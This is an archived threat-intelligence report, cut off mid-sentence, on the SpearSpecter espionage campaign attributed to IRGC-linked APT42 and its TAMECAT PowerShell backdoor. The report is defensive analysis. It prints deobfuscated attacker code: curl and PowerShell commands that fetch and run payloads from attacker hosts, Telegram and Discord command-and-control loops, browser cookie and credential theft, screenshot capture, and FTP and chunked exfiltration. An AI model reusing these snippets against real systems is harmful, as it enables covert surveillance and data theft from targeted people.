{
	"id": "6d028990-1e48-4256-875b-86bd494e83ff",
	"created_at": "2026-04-06T00:18:19.873413Z",
	"updated_at": "2026-04-10T13:12:32.353359Z",
	"deleted_at": null,
	"sha1_hash": "686b64604331d09ecd155ffe6a379958f2d87b32",
	"title": "SpearSpecter",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1254019,
	"plain_text": "SpearSpecter\r\nArchived: 2026-04-05 21:59:19 UTC\r\nSpearSpecter: Unmasking Iran’s IRGC\r\nCyber Operations Targeting\r\nHigh-Profile Individuals\r\nPublished: Nov 2025\r\nBy: Shimi Cohen, Adi Pick, Idan Beit-Yosef, Hila David, and Yaniv Goldman\r\nTags: SpearSpecter, APT42, IRGC, TAMECAT, Social Engineering, Fileless Malware, Discord C2, Telegram C2,\r\nCloud Infrastructure Abuse, Threat Research, Nation-State Threats\r\nExecutive Summary\r\nIsrael National Digital Agency researchers have uncovered an ongoing, sophisticated espionage campaign, which\r\nwe track as SpearSpecter, conducted by Iranian threat actors aligned with the Islamic Revolutionary Guard\r\nCorps Intelligence Organization (IRGC-IO) that operates under multiple aliases, including APT42, Mint\r\nSandstorm, Educated Manticore, and CharmingCypress.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 1 of 48\n\nThe group's main objective is espionage against individuals or organizations of interest to the IRGC. Their attacks\r\ndemonstrate the stealth and persistence of nation-state actors. They rapidly adapt their tactics, techniques, and\r\nprocedures (TTPs).\r\nThe campaign has systematically targeted high-value senior defense and government officials using personalized\r\nsocial engineering tactics. These include inviting targets to prestigious conferences or arranging significant\r\nmeetings. In addition, the campaign broadens its scope by also targeting family members, thereby widening the\r\nattack surface and increasing pressure on the primary targets.\r\nSpearSpecter distinguishes itself through relationship building and trust cultivation. Instead of mass phishing,\r\noperators spend days or weeks developing authentic-seeming relationships with targets. 
They now extend\r\nengagement via direct WhatsApp communication, adding familiarity and legitimacy to social engineering, which\r\nhelps them successfully introduce malicious elements.\r\nWithin the SpearSpecter campaign, the threat actor adapts its approach based on the value of the target and\r\noperational objectives. For credential harvesting, attackers direct victims to crafted spoofed meeting pages that\r\ncapture credentials in real time. For long-term data-driven access, they deploy a sophisticated PowerShell-based\r\nbackdoor known as TAMECAT (as named by Google), with modular components designed to facilitate data\r\nexfiltration and remote control.\r\nThis article highlights the threat actor's recently observed TTPs. Specifically, it examines new TAMECAT\r\nmodules, a multi-channel Command and Control infrastructure using Telegram and Discord, payload staging via\r\nWebDAV infrastructure, and creative exploitation of native Windows features.\r\nOur investigation identified tools, infrastructure components, and operational patterns within SpearSpecter. These\r\nstrongly align with activity historically attributed to Iranian state-aligned actors within the IRGC's cyber apparatus.\r\nThe strategic focus on senior leadership, combined with these tailored delivery methods and custom tooling,\r\nexemplifies the patient, intelligence-first operations characteristic of state-sponsored APT groups.\r\nTrust Through Sophisticated Social Engineering Engagement\r\nSpearSpecter elevates spear-phishing by devoting weeks to building personalized relationships with high-value\r\ntargets. They gather deep intelligence and use tailored engagement strategies.\r\nThe threat actor conducts extensive reconnaissance via social media, public databases, and professional networks.\r\nThis enables them to impersonate people from the victim's affiliations and craft believable scenarios involving\r\nexclusive conferences or strategic meetings (physical in some cases). 
They sustain multi-day conversations to build\r\ncredibility. Use of WhatsApp further adds perceived legitimacy.\r\nInitial Access \u0026 Deployments\r\nTo gain long-term access, attackers send the victim a link. They usually claim it is a required document for an\r\nupcoming meeting or conference. When clicked, the victim is redirected to a lure document hosted on OneDrive.\r\nSeveral background redirects silently execute before the document loads.\r\nOne redirect leads to a crafted web page that abuses the Windows search-ms URI protocol handler. This tactic\r\ntriggers a pop-up prompt asking the user to \"Open Windows Explorer\".\r\nFigure 1: Chrome prompt asking the user to confirm Explorer access requested by the web page.\r\nIf the victim confirms the prompt, Explorer connects to the attacker's WebDAV server (WebDAV is a protocol for sharing files\r\nover the internet). In the background, the rundll32.exe process runs the DavSetCookie function in the Windows\r\nlibrary davclnt.dll, which establishes an HTTP connection to the WebDAV server. 
The following command is\r\nexecuted:\r\nrundll32.exe C:\\WINDOWS\\system32\\davclnt.dll, DavSetCookie datadrift[.]somee[.]com@SSL hxxps[://]datadrift[.]somee[.]com/aoh5/[REDACTED].lnk\r\nThis remote share displays a malicious LNK file (shortcut) to the victim, disguised as a PDF.\r\nFigure 2: Initial access LNK file shared via WebDAV pretending to be a PDF file.\r\nIf the victim clicks the shortcut, it silently runs a command shell that uses curl to fetch and run a batch script from\r\nCloudflare Workers.\r\nThe following shows a cleaned and deobfuscated version of the command that fetches and executes the batch script\r\n(temp.bat):\r\ncmd /c curl --ssl-no-revoke -o vgh.txt hxxps[://]line[.]completely[.]workers[.]dev/aoh5 \u0026 rename vgh.txt temp.bat \u0026 %tmp%\r\nTemp.bat functions as TAMECAT's primary loader and the core of its modular architecture. The batch file contains\r\nobfuscated PowerShell that fetches further payloads and runs them in memory, minimizing disk artifacts and\r\nreducing detection risk.\r\nThe following is a deobfuscated PowerShell command from Temp.bat that shows TAMECAT's module fetch-and-load\r\ncycle:\r\npowershell -w 1 \"$lb='gBjs';$uq=(invoke-restmethod -UserAgent 'Chrome' 'hxxps[://]line[.]completely[.]workers[.]dev[/]aoh52');.(gcm i*ee*)$uq\r\nThis approach enables continuous retrieval of new modules and capabilities from the C2 infrastructure throughout\r\nthe malware's lifecycle.\r\nThis loader creates a persistence entry that points to a file in the %LOCALAPPDATA%\\Microsoft\\Windows\\AutoUpdate\r\ndirectory. The file name is randomly generated at runtime. 
In the observed sample, the file was\r\nfhgPcZTORoCNEDsm.txt.\r\nThe same persistence mechanism triggers PowerShell to read and execute the stored script in memory:\r\npowershell -w 1 \"$PbwpcDxXtAnaGrsu=(Get-Content -Path C:\\Users\\victim\\AppData\\Local\\Microsoft\\Windows\\AutoUpdate\\fhgPczTORoCNEDsm.txt);\u0026(gcm i*x)$PbwpcDxXtAnaGrsu\"\r\nOnce running, the loader cycles through a list of command-and-control (C2) servers. It continues until it finds a valid\r\ncontroller payload. Each payload is a TAMECAT module.\r\nModular Fileless Execution: TAMECAT's In-Memory Loader Chain\r\nThe main activity in this campaign involves TAMECAT malware.\r\nOur research revealed TAMECAT modules that extend the attacker's capabilities by adding multi-channel Command\r\nand Control (C2) infrastructure via Telegram and Discord - an evolution not previously documented in reports on\r\nAPT42 activity.\r\nTo understand the behavior of TAMECAT's modules, it is important to note that each module handles a specific task.\r\nTAMECAT uses a modular PowerShell framework to maintain persistence and conduct system reconnaissance. 
It\r\ncollects browser data and credentials, executes remote commands, and exfiltrates data.\r\nThe following sections provide a full attack flow diagram and a focused deep dive into TAMECAT's operational\r\nactivity and techniques.\r\nFigure 3: TAMECAT's In-Memory Loader Chain.\r\nMulti-Channel Command and Control Infrastructure\r\nIn the SpearSpecter campaign, the attacker deployed three distinct C2 channels: HTTPS, Discord, and Telegram.\r\nThe use of multiple redundant C2 channels, combined with legitimate service infrastructure, demonstrates the\r\nattacker's intent to maintain long-term, stealthy access while focusing on resilience against detection and disruption.\r\nThe attacker encrypted all data transfers over these channels using the AES-256 algorithm, with a hardcoded\r\nencryption key and a random 16-character IV. The IV was transmitted to the operator through a custom header\r\nnamed Sec-Host.\r\nThe SpearSpecter campaign was the first recorded instance of APT42 using Telegram and Discord as C2.\r\nTelegram C2 Mechanism\r\nTAMECAT listens for commands from the attacker's Telegram bot. 
Based on the received message, the script fetches\r\nand executes additional PowerShell code from different domains, all hosted under Cloudflare Workers\r\n(workers[.]dev).\r\nThis modular approach allows the attacker to dynamically load and execute additional payloads depending on their\r\nobjective on the compromised host.\r\nSuspicious Command Keyword | Associated Domain\r\nInvest   | eaggcz2fj7yzqdzx97i96[.]darijo-bosanac-dl[.]workers[.]dev\r\nScene    | f3nq6re4nmjwbr8ks5g2qu[.]darijo-bosanac-dl[.]workers[.]dev\r\nLook     | kxp5sxfwiu7b6quo346hhyc[.]darijo-bosanac-dl[.]workers[.]dev\r\nCnvrt    | 2tv995jjg6cx679bspy[.]darijo-bosanac-dl[.]workers[.]dev\r\nTrsdls   | mvwmh7pxxd33375gj9wwjhcmbk[.]darijo-bosanac-dl[.]workers[.]dev\r\nAnchor   | 27ehoddkc8t7jer4aic55uh3[.]darijo-bosanac-dl[.]workers[.]dev\r\nTrnspt   | w5fb5r3txrsvga7zot9uz54k[.]darijo-bosanac-dl[.]workers[.]dev\r\n#Journey | Used to set the decryption key\r\nIncoming Telegram messages are evaluated by the script against a set of supported commands. If a message is not\r\namong those commands, is not the literal \"exit\", and does not start with the prefix \"#journey\", the script treats the\r\nmessage as a PowerShell payload and executes it.\r\nWhen executed, the PowerShell script runs and writes the output to a file located at $env:TEMP\\UZ4sWF2aV.txt. The\r\noutput file is then sent back to the Telegram bot, allowing the attacker to receive the command result.\r\nThis approach enables the attacker to maintain dynamic and resilient remote code execution capabilities on\r\ncompromised hosts. 
This ensures persistence and operational continuity even when protective measures, such as\r\nCloudflare, block the actor's infrastructure.\r\nPowerShell\r\nwhile ($true) {\r\n    $uri = 'hxxps[://]api.telegram[.]org/$Sguqs9XH8vzLVtp/getUpdates?offset=$($lastIncomingID+1)';\r\n    $response = \u0026(gcm i*e-r*tme*?) -UserAgent $asjkl -Uri $uri;\r\n    foreach ($RSS in $response.result) {\r\n        if ($RSS.message) {\r\n            $telegraf = $RSS.message.text;\r\n            if ($telegraf -ne $BookmarkCM) {\r\n                if ($telegraf -like \"\\#journey*\") {\r\n                    $rk = $telegraf.Substring(8).Trim();\r\n                    if ($rk.Length -eq 32) {\r\n                        ....\r\n                if ($telegraf -eq \"\\/invest\") {\r\n                    ....\r\n                if ($telegraf -eq \"\\/anchor\") {\r\n                    if ($y6m3bhjadnfv7wg5s.Length -eq 32) {\r\n                        try {\r\n                            $compose = (wget -UserAgent $asjkl \"hxxps[://]27ehoddkc8t7jer4aic55uh3.darijo-bosanac-dl[.]workers[.]dev\");\r\n                            $anchor = iajbejkf -key $y6m3bhjadnfv7wg5s -data $compose.Content;\r\n                            \u0026 (gcm i*? -e*n) $anchor;\r\n                            $BookmarkCM = $telegraf;\r\n                        }\r\n                        catch {\r\n                            ...\r\n                if ($telegraf -ne \"\\/invest\" -and $telegraf -ne \"\\/look\" -and $telegraf -ne \"\\/anchor\" -and $telegraf -ne \"\\/trsdls\" -and $telegraf -ne \"\\/cnvrt\" -and $telegraf -ne \"\\/scene\" -and $telegraf -ne \"\\/trnspt\" -and $telegraf -notlike \"\\#journey*\") {\r\n                    if ($telegraf -ne \"\\/exit\") {\r\n                        $result = \u0026(gcm i*?-e*n) $telegraf | Out-String;\r\n                        $result1 | Out-File -FilePath \"$env:TEMP\\UZ4sWF2aV.txt\" -Encoding UTF8;\r\n                        Start-Sleep -Seconds (Get-Random -Minimum 4 -Maximum 9);\r\n                        ....\r\n                        remove-item \"$env:TEMP\\UZ4sWF2aV.txt\";\r\n                    }\r\nFigure 4: Getting the command message and running the corresponding PowerShell.\r\nDiscord C2 Mechanism\r\nIn the Discord C2 channel, the attacker used a traditional Discord webhook URL to forward messages and a\r\nhardcoded channel ID with a bot token to fetch commands.\r\nA Discord webhook is a special URL that allows external applications to send messages to a specific Discord channel.\r\nIt's an easy way to integrate Discord with other applications, delivering notifications directly to a server channel\r\nwithout complex bot programming.\r\nThe Discord C2 module has two main functions: one sends basic info about the infected system to a Discord\r\nwebhook URL, while the second is a retrieval function that receives commands from a hardcoded Discord channel.\r\nThe retrieval function retrieves commands using a bot token and channel ID, then searches for messages sent by a\r\nspecific user (in this case, \"mick\"). 
When a message is found, it extracts the attached file and fetches the PowerShell\r\nscript from it (which is obfuscated \u0026 encrypted).\r\nAnalysis of accounts recovered from the actor's Discord server suggests the command lookup logic relies on\r\nmessages from a specific user, allowing the actor to deliver unique commands to individual infected hosts while\r\nusing the same channel to coordinate multiple attacks, effectively creating a collaborative workspace on a single\r\ninfrastructure.\r\nAdditionally, after fetching the first messages, the module saves the message ID in the\r\nHKCU:\\SOFTWARE\\firstOrder\\id registry key to ensure only newer messages are processed next time and avoid\r\nrunning the same commands repeatedly.\r\nPowerShell\r\nfunction func_get_commands_from_discord() {\r\n    if ($global:mId -eq 0) {\r\n        $wsxbebgushqoryzj = \"hxxps[://]discord[.]com/api/channels/{REDACTED}\" + \"/messages\";\r\n    }\r\n    else {\r\n        $wsxbebgushqoryzj = \"hxxps[://]discord[.]com/api/channels/{REDACTED}\" + \"/messages?after=$global:mId\";\r\n    }\r\n    $gufgtgudxbokisiqun = \u0026((\u0026gcm) (New-Object )) -Co (MSXML2.serverXMLHTTP)\r\n    $gufgtgudxbokisiqun.open(\"GET\", $wsxbebgushqoryzj, $false)\r\n    $gufgtgudxbokisiqun.setRequestHeader(\"Authorization\", \"Bot MTxqNDg4{REDACTED}2ya1GmP-_bG3-h-oJuOq7gpwoJ_ax8\");\r\n    $gufgtgudxbokisiqun.setRequestHeader(\"User-Agent\", \"DiscordBot\");\r\n    try {\r\n        $gufgtgudxbokisiqun.send()\r\n        if ($gufgtgudxbokisiqun.status -ne 200) {\r\n            throw \"02122008\"\r\n        }\r\n        $sisxgnnswidrxnuma = $gufgtgudxbokisiqun.responseText | ConvertFrom-Json\r\n        $seebxgulhsoyyp = $sisxgnnswidrxnuma | Where-Object {($_.author.username -eq \"mick\") -and ($_.attachments.url -ne $null) -and ($_.content.Length -eq 16)}\r\n    }\r\n    catch {\r\n    }\r\n    if ($sisxgnnswidrxnuma.Length -gt 0) {\r\n        $global:mId = $sisxgnnswidrxnuma[0].id\r\n        $efxgooxzkq = New-ItemProperty -Path 'HKCU:\\SOFTWARE\\firstOrder\\' -Name id -Value $global:mId -Force\r\n    }\r\n    return $seebxgulhsoyyp\r\n}\r\nFigure 5: Queries Discord for commands and stores the last message ID in the registry.\r\nPowerShell\r\nfunction func_discord_C2_req() {\r\n    $wsxbebgushqoryzj = \"hxxps[://]discord[.]com/api/webhooks/141{REDACTED}3215/dsC1ORNt{REDACTED}TvZ4ykpc52NAferf;\"\r\n    $OS_version = (Get-WmiObject -class Win32_OperatingSystem).Caption + \" Enc\"\r\n    $rctycno = \"{\\\"fD!LJplkwnuMBHx\\\": [{\\\"num\\\": '\" + $global:numone + + $OS_version + + $env:COMPUTERNAME + + $sseyuqiyosawuh +\r\n    $neplpvfyvydldjjc = func_random_16_chars;\r\n    $igsftpzippdunnlnagd = func_AES_encryption -krfuzkxgppuz $rctycno -jgxylumafjcztgnspkj $eirimyofqrszfghnc -xemjwduuof $neplpvfyvydldjjc;\r\n    $etedsuomdywrz = @{ \"data\" = @{ \"json\" = $igsftpzippdunnlnagd }; \"Sec-Host\" = $neplpvfyvydldjjc } | ConvertTo-Json\r\n    $bvkakf = @{ \"content\" = $etedsuomdywrz }\r\n    $gufgtgudxbokisiqun = \u0026((\u0026gcm) (New-Object )) -Co (MSXML2.serverXMLHTTP)\r\n    $gufgtgudxbokisiqun.open(\"POST\", $wsxbebgushqoryzj, $false)\r\n    $gufgtgudxbokisiqun.setRequestHeader(\"Content-type\", \"application/json\")\r\n    $gufgtgudxbokisiqun.setRequestHeader(\"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0\")\r\n    try {\r\n        $gufgtgudxbokisiqun.send(($bvkakf | ConvertTo-Json))\r\n        if ($gufgtgudxbokisiqun.status -ne 204) {\r\n            throw \"hbaefhsekjf\"\r\n        }\r\n        return \"OK\"\r\n    }\r\n}\r\nFigure 6: The function that sends basic system info to the Discord webhook.\r\nThe IV (Initialization Vector) used to encrypt the data sent is included in the JSON field called Sec-Host. This\r\nfollows the same approach used to deliver the IV in the HTTP C2 channel, except that it is embedded in the message\r\nrather than an HTTP header.\r\nDiscovery \u0026 Data Harvesting\r\nTAMECAT's approach to reconnaissance and data theft is deliberate, stealthy, and carefully orchestrated to minimize\r\ndetection while maximizing data-collection effectiveness. Unlike indiscriminate dumping of all data, the backdoor\r\nselectively gathers high-value artifacts such as documents, browser data, general system information, and\r\nscreenshots. Collected artifacts are queued and exfiltrated via encrypted channels.\r\nInitial Reconnaissance Modules\r\nFour compact modules provide TAMECAT's initial reconnaissance capability. 
The Information module fingerprints\r\nthe host for targeting by collecting the OS and its version, hostname and domain, user and privilege level, network\r\nconfiguration, uptime, and patch status.\r\nThe Application module inventories installed software and associated metadata, including versions, install paths,\r\nMSI and registry entries, and common persistence locations.\r\nThe Processes module captures runtime process state, including process trees, command lines, and loaded modules,\r\nenabling operators to identify injection targets, confirm staged components, detect security solutions, and harvest\r\ncredentials or other in-memory artifacts.\r\nUsing the Shell module, the attacker also enumerated installed antivirus and endpoint protection products, collected\r\ntargeted data into a list file for later exfiltration, and staged the target Outlook OST file before exfiltration. The\r\nmodule executes arbitrary shell commands via a cmd.exe /c wrapper.\r\nFiles and Documents\r\nThe TAMECAT FileCrawler module builds a quiet staging queue of target files before exfiltration. The tool\r\nenumerates filesystem roots and aggregates selected file paths into ALL*.txt files, such as ALL.txt and ALL-2.txt, under %LOCALAPPDATA%\\Caches.\r\nThese files serve as the queue of approved items awaiting exfiltration. 
Each entry is a full file path encoded in\r\nBase64 and separated by a triple-semicolon delimiter (;;;).\r\nTAMECAT implements targeted file collection focusing on high-value document types:\r\n*.txt, *.pdf, *.xlsx, *.xls, *.csv, *.kdbx, *.docx, *.doc, *.gdoc, *.ppt, *.pptx,\r\n*.mp4, *.mov, *.wmv, *.flv, *.avi, *.webm, *.mkv, *.m4a, *.mp3, *.wav, *.wma,\r\n*.aac, *.ogg, *.opus, *.jpg, *.jpeg, *.gif, *.png, *.odt, *.rtf, *.zip, *.rar,\r\n*.7z.\r\nTo maximize efficiency and reduce noise, the malware excludes noisy or low-value locations:\r\n\"*\\iCloudPhotos*\", \"*\\OneDrive*\", \"*\\All Users*\", \"*\\AppData*\", \"*cache*\",\r\n\"*tdata*\", \"*program*\", \"*window*\", \"*windows*\", \"*mingw*\", \"*msocache*\",\r\n\"*tdata*\", \"*visual studio*\", \"*visualstudio*\", \"*android studio*\",\r\n\"*androidstudio*\", \"*android*\", \"*$*\", \"*anaconda*\", \"*vscode*\", \"*site-packages*\", \"*pycharm*\", \"*\\.*\", \"*.nuget*\", \"*.jd*\", \"*packages\".\r\nThe module also creates a FileCrawler.txt that lists the file extension, name, full path, size, creation time, and last\r\naccess time of the approved files.\r\nThe deobfuscated code below displays the module's file and document collection process:\r\nPowerShell\r\n# Enumerate drives and crawl files to build ALL.txt and FileCrawler.txt\r\n$include = @('*.txt','*.pdf','*.xlsx', ... \u003cfull list above\u003e ...)\r\n$exclude = @('iCloudPhotos','OneDrive','All Users', ... \u003cfull list above\u003e ...)\r\n\r\n$queueFile   = Join-Path $env:LOCALAPPDATA 'Caches\\ALL.txt'\r\n$metaFile    = Join-Path $env:LOCALAPPDATA 'Caches\\FileCrawler.txt'\r\n$downloadBuffer = \"\"\r\n$metaBuffer   = \"\"\r\n\r\n# Recursively scan drives\r\nGet-PSDrive -PSProvider FileSystem | ForEach-Object {\r\n    Get-ChildItem -Path $_.Root -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\r\n        $path = $_.FullName\r\n        $name = $_.Name\r\n        if ($exclude | Where-Object { $path -match $_ }) { return }\r\n        if ($include | Where-Object { $name -like $_ }) {\r\n            $ext       = $_.Extension\r\n            $size      = $_.Length\r\n            $creation  = $_.CreationTimeUtc\r\n            $lastAccess= $_.LastAccessTimeUtc\r\n\r\n            # Append metadata to FileCrawler.txt\r\n            $metaBuffer += \"$ext|$name|$path|$size|$creation|$lastAccess`r`n\"\r\n\r\n            # Encode path as Base64 and add to ALL.txt queue\r\n            $pathB64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($path))\r\n            $downloadBuffer += $pathB64 + ';;;'\r\n        }\r\n    }\r\n}\r\n\r\n# Write the collected data to disk\r\n$metaBuffer      | Out-File -FilePath $metaFile -Encoding utf8\r\n$downloadBuffer  | Out-File -FilePath $queueFile -Encoding utf8\r\nFigure 7: File and document collection by TAMECAT\r\nBrowser Data Extraction \u0026 Collection\r\nMicrosoft Edge Data Extraction via Remote Debugging\r\nTAMECAT bypasses the complexity and limitations of directly parsing locked browser databases by exploiting\r\nMicrosoft Edge's native remote debugging capabilities. 
The TAMECAT Browser module handles this activity. The backdoor launches Microsoft Edge in a fully hidden mode, disables its sandbox\r\nto allow unrestricted access, and opens a remote debugging port locally on 9222 with the following command:\r\n\"msedge.exe\" --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000\r\nFollowing this, TAMECAT queries the local debugging endpoint at:\r\nhttp://localhost:9222/json\r\nThis endpoint returns a list of active DevTools targets representing all open browser contexts, such as tabs and\r\nservice workers.\r\nTAMECAT then establishes WebSocket connections to each target's webSocketDebuggerUrl\r\n(ws://127.0.0.1:9222/devtools/page/\u003ctarget_id\u003e) and sends DevTools Protocol commands such as\r\n{\"id\":1,\"method\":\"Storage.getCookies\"}.\r\nThese commands instruct the browser to transmit all stored cookies for the browsing context, returning them fully\r\ndecrypted via the browser's internal APIs. 
This innovative approach eliminates the need to manually copy and\r\ndecrypt the browser's SQLite database files.\r\nFinally, the acquired cookie data is serialized into JSON format and stored locally under paths such as:\r\n%LOCALAPPDATA%\\Caches\\BS\\Cookie__Last\u003cid\u003e.json\r\nwhere \u003cid\u003e corresponds to the DevTools target identifier, facilitating organized storage and later exfiltration of stolen\r\ncredentials.\r\nChrome Suspension for Data Extraction\r\nBecause Chrome stores its profile in SQLite databases, such as Login Data, Network\\Cookies, and Web Data, which it keeps\r\nlocked during active browsing sessions, direct access is often blocked or unreliable.\r\nTo bypass this, TAMECAT uses the legitimate Sysinternals tool PsSuspend to suspend the Chrome process\r\ntemporarily, enabling safe access to the locked databases without corruption:\r\nC:\\Users\\victim\\AppData\\Local\\Caches\\pssuspend.exe -accepteula -nobanner \u003cchrome_pid\u003e\r\nThis suspension releases file locks, allowing the malware to safely copy or read the profile databases.\r\nNext, TAMECAT launches Microsoft Edge in an off-screen, sandbox-disabled mode that acts as a trusted\r\nintermediary to open Chrome's profile data:\r\n\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\r\n --profile-directory=\"Default\"\r\n --window-size=\"0,0\"\r\n --window-position=\"-32000,-32000\"\r\n --no-sandbox\r\n \"C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\"\r\n \"C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\"\r\n \"C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data\"\r\nThis process results in fully accessible and readable data files, which TAMECAT then parses using libraries such as\r\nSystem.Data.SQLite.dll to extract sensitive 
credentials and browsing history.\r\nFinally, the collected data is compressed into archives such as Data_Chrome__Default.rar before being staged for\r\ncovert exfiltration.\r\nStealthy Screen Capture\r\nTAMECAT's Screen module captures 50 screenshots at 15-second intervals.\r\nEach image is temporarily saved locally at:\r\n%LOCALAPPDATA%\\Caches\\SS\\NO\\\r\nImmediately after capture, each screenshot is uploaded and then deleted from local storage to reduce forensic traces.\r\nBelow is the deobfuscated, cleaned code extracted from the original module:\r\nPowerShell\r\n# .NET assemblies used by the capture routine\r\nAdd-Type -AssemblyName System.Windows.Forms, System.Drawing\r\n\r\n# One-shot full desktop screenshot to PNG, written to $Path\r\nfunction Save-Screenshot($Path) {\r\n    $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\r\n    $bmp    = New-Object System.Drawing.Bitmap($screen.Width, $screen.Height)\r\n    $gfx    = [System.Drawing.Graphics]::FromImage($bmp)\r\n    $gfx.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size)\r\n    $bmp.Save($Path, [System.Drawing.Imaging.ImageFormat]::Png)\r\n    $gfx.Dispose(); $bmp.Dispose()\r\n}\r\n\r\n...\r\n# Take 50 screenshots, 15s apart\r\n1..50 | ForEach-Object {\r\n    $name = (Get-Date -Format 'yyyy-dd-MM_HH-mm-ss') + '.png'\r\n    $png   = Join-Path $cacheDir $name\r\n    Save-Screenshot $png\r\n    # exfiltrate $png\r\n    Remove-Item -Force $png -ErrorAction SilentlyContinue\r\n    Start-Sleep -Seconds 15\r\n}\r\nFigure 8: Screenshot collection by TAMECAT\r\nOutlook OST Collection\r\nThe TAMECAT Shell module was used to perform targeted collection of Outlook mailboxes. 
The module copies the\r\nlocal .ost cache files from Outlook profile directories, splits the data into chunks, and exfiltrates the data over\r\nencrypted channels, enabling the extraction of high-value mailbox content from the victim. This shows the attacker's\r\ninterest in email-related information.\r\nPowerShell\r\n# Copy user mailbox cache from Outlook directory\r\ncopy-item C:/Users/{USER}/AppData/Local/Microsoft/Outlook/@example.com.ost `\r\n    $env:APPDATA/victim@example.com.ost\r\nFigure 9: Outlook OST file copied by TAMECAT into the exfiltration folder\r\nStealing in Silence: TAMECAT's Data Exfiltration Game\r\nAfter collecting targeted data, TAMECAT stages and packages the artifacts for transmission using channels often\r\nshared with its command-and-control (C2) infrastructure. The data is first encrypted and transformed into JSON\r\nbefore being sent over a secure connection to evade interception. The Download module is responsible for the\r\ndifferent exfiltration methods.\r\nPackaging \u0026 Staging\r\nTargeted exfiltration begins with the queue file ALL.txt, where the tool consumes a single entry per iteration,\r\ndecodes that Base64-encoded entry to recover the full file path, and adds the path to the current run set. Browser data\r\nand screenshots generated by other modules are included in the exfiltration run set.\r\nThe files are compressed into archives using a renamed WinRAR binary called R.exe, and those archives are\r\nplaced in the cache folder for upload.\r\nTo stream large files without loading them into PowerShell memory, TAMECAT uses a small managed helper named\r\nRuns.dll.\r\nChunked Exfiltration with Runs.dll Helper\r\nRuns.dll is a tiny .NET helper that reads a byte-range from a file and returns that slice (already Base64-encoded)\r\nto PowerShell. 
The module uses it to break large artifacts (archives, JSON dumps, screenshots) into 5 MB chunks\r\nand upload them.\r\nTAMECAT loads the DLL and creates the reader2.reader object, sets a 5 MB chunk size, and calculates how many\r\nchunks the file will be split into based on its total length. For each chunk, it calls the Runs.dll function\r\nStart(startOffset, endOffset, FullPath) to read the specified byte range and return it as Base64, so the file can\r\nbe streamed piece by piece without loading the whole file into memory.\r\nThe relevant deobfuscated code that divides data into chunks via Runs.dll is shown below:\r\nPowerShell\r\n# Load the helper\r\nAdd-Type -Path $env:LOCALAPPDATA\\Caches\\Runs.dll\r\n# Instantiate the class (namespace: reader2, class: reader)\r\n$reader = New-Object reader2.reader\r\n\r\n# 5 MB chunk configuration\r\n$ChunkSize = 5000000\r\n$FileLen = (Get-Item $FullPath).Length\r\n$Parts = [math]::Floor($FileLen / $ChunkSize) + 1\r\n\r\n# Per-chunk: call the Runs.dll Start() function and get the chunk back as Base64\r\n# (loop and offset arithmetic follow the behaviour described above; end offset assumed exclusive)\r\nfor ($i = 0; $i -lt $Parts; $i++) {\r\n$startOffset = $i * $ChunkSize\r\n$endOffset   = [math]::Min($startOffset + $ChunkSize, $FileLen)\r\n$chunkB64 = $reader.Start($startOffset, $endOffset, $FullPath)\r\n...\r\n}\r\nFigure 10: Runs.dll loaded by TAMECAT to chunk data for exfiltration\r\nEach chunk is wrapped in a compact JSON envelope that contains the metadata required to reassemble, verify, and\r\ntrack the upload by the actor.\r\nPowerShell\r\n# Build the JSON envelope that carries this chunk\r\n$envelope = @{\r\ncmd = \"upload\"\r\nfile_name = [IO.Path]::GetFileName($FullPath)\r\nfile_size = $FileLen\r\npart_index = $i + 1\r\ntotal_parts = $Parts\r\nchunk_size = $ChunkSize\r\nchunk_data_b64 = 
$chunkB64\r\ntimestamp_utc = Get-Date\r\n} | ConvertTo-Json -Compress\r\nFigure 11: Structure of the JSON envelope used to carry each chunk\r\nTAMECAT reuses its C2 uploader implementation for exfiltration to reduce the number of distinct outbound\r\nconnections. The JSON envelope is encrypted as described in the Encryption section and then transferred over\r\nHTTPS to the configured endpoint.\r\nWhen an envelope upload fails, the client retries and resumes from the last acknowledged offset rather than restarting\r\nthe entire transfer.\r\nFTP Exfiltration\r\nTAMECAT can also exfiltrate data over FTP as an alternate transport alongside HTTPS and the other C2 channels.\r\nWhen FTP is selected, the loader follows the same staged workflow used for other transports but adapts the transfer\r\nto the FTP protocol.\r\nFiles are uploaded with System.Net.FtpWebRequest in binary and passive mode. 
The loader builds an ftp:// URI,\r\nsupplies a NetworkCredential object constructed from runtime-injected values, and writes the raw file bytes to the\r\nrequest stream.\r\nPowerShell\r\n# global variables holding the injected values\r\n$ftpHost    = $global:FTPEndpoint\r\n$ftpUser    = $global:FTPUser\r\n$ftpPass    = $global:FTPPassword\r\n$remotePath = \"[PATH]\"\r\n$localFile  = \"[Exfiltrated File PATH]\"\r\n...\r\n# Build ftp uri\r\n$uri = [Uri]::new(\"$ftpHost/$remotePath\")\r\n...\r\n# Create request and configure transport\r\n$req = [System.Net.FtpWebRequest]::Create($uri)\r\n$req.Method    = [System.Net.WebRequestMethods+Ftp]::UploadFile\r\n$req.Credentials = New-Object System.Net.NetworkCredential($ftpUser, $ftpPass)\r\n$req.UseBinary   = $true\r\n$req.UsePassive = $true\r\n...\r\n# Read file bytes and upload\r\n$bytes = [System.IO.File]::ReadAllBytes($localFile)\r\n$req.ContentLength = $bytes.Length\r\n$stream = $req.GetRequestStream()\r\n$stream.Write($bytes, 0, $bytes.Length)\r\n# close the data stream and complete the transfer\r\n$stream.Close()\r\n$req.GetResponse().Close()\r\nFigure 12: FTP upload flow using System.Net.FtpWebRequest\r\nEvasion Masterclass: Inside TAMECAT's Stealth Tactics\r\nTAMECAT 